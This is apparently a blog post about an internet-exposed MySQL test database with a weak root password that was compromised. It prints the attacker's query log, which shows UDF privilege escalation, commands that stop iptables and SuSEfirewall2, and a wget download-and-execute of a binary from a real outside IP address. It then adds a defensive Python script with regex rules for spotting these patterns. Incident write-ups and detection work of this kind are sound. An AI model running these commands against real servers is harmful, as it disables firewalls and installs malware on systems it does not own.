This happened on a test database. The earlier deployment overlooked that the host had a public address, and the password had been set to something simple: the root password was 123456. Unexpectedly, it was soon scanned and logged into, a user was created, and an attempt was made to use a MySQL UDF to gain system privileges on the machine. The log is as follows:
108883 Connect [email protected] on
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'mysqludf.so'
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'mysqludf64.so'
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf.so'
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'udf.so'
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'xiaoji64.so'
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'xiaoji.so'
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'liunx32.so'
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'liunx64.so'
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME "lib_mysqludf_sys.so"
108883 Query CREATE FUNCTION mylab_sys_exec RETURNS integer SONAME "mylab_sys_exec.so"
108883 Query system wget http://106.122.249.81:222/Client32
108883 Query system chmod +x Client32
108883 Query system chmod 777 Client32
system ./Client32
108883 Query SELECT sys_eval("/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c
http://106.122.249.81:222/Client32;chmod 777 Client32;./Client32;")
108883 Query SELECT mylab_sys_exec (/etc/init.d/iptables stop
108883 Query service iptables stop
108883 Query SuSEfirewall2 stop
108883 Query reSuSEfirewall2 stop
108883 Query wget -c http://106.122.249.81:222/Client32
151208 10:09:40 108883 Query chmod 777 Client32
108883 Query ./Client32
108883 Query ");
How UDF privilege escalation works is not covered in detail here.
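The pattern in this log can be picked out of a general query log automatically. The following is an added example, not part of the original post: it groups log lines by thread id and flags sessions that register a shared-library UDF and then run commands. It assumes the log layout matches the excerpt above (optional timestamp, thread id, command, argument); the sample lines and addresses are constructed.

```python
import re
from collections import defaultdict

# Assumed layout: [YYMMDD HH:MM:SS] <thread id> <command> <argument>
LINE = re.compile(r"^(?:\d{6}\s+\d{1,2}:\d{2}:\d{2})?\s*(\d+)\s+(Connect|Query|Quit)\s*(.*)$")

# Indicators taken from the behaviour visible in the log above.
RULES = {
    "udf_create": re.compile(r"\bCREATE\s+FUNCTION\s+\w+\s+RETURNS\s+\w+\s+SONAME\b", re.I),
    "udf_call": re.compile(r"\bSELECT\s+\w*sys_(?:eval|exec)\s*\(", re.I),
    "client_shell": re.compile(r"^system\b", re.I),
    "firewall_stop": re.compile(r"\b(?:iptables|SuSEfirewall2)\s+stop\b", re.I),
    "download": re.compile(r"\b(?:wget|curl)\b.*https?://", re.I),
}

def scan(lines):
    """Return {thread_id: set of rule names that fired in that session}."""
    hits = defaultdict(set)
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            continue  # lines without a thread id (headers, continuations) are skipped
        thread, command, arg = m.groups()
        if command != "Query":
            continue
        for name, rx in RULES.items():
            if rx.search(arg):
                hits[thread].add(name)
    return dict(hits)

def high_risk(hits):
    """Sessions that register a UDF and also show command execution or a download."""
    follow_up = {"udf_call", "client_shell", "download", "firewall_stop"}
    return sorted(t for t, r in hits.items() if "udf_create" in r and r & follow_up)

# Constructed sample log (documentation addresses, not data from the incident).
SAMPLE = """\
151208 10:09:38 41 Connect app@192.0.2.20 on shop
41 Query SELECT id, name FROM products WHERE id = 7
151208 10:09:40 57 Connect root@192.0.2.99 on
57 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'udf.so'
57 Query SELECT sys_eval("service iptables stop; wget -c http://198.51.100.7/Client32")
41 Query CREATE FUNCTION to_cents(x INT) RETURNS INT RETURN x * 100
""".splitlines()

if __name__ == "__main__":
    found = scan(SAMPLE)
    print(found, high_risk(found))
```

The stored function created by thread 41 has no SONAME clause and is not flagged. For a session that is flagged, the `mysql.func` table and the directory named by `plugin_dir` are the places to check for unexpected entries.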
This article is from the "Memory Fragments" blog; please keep this source link when reposting: http://weikle.blog.51cto.com/3324327/1761297
Security issues with UDF introduced in MySQL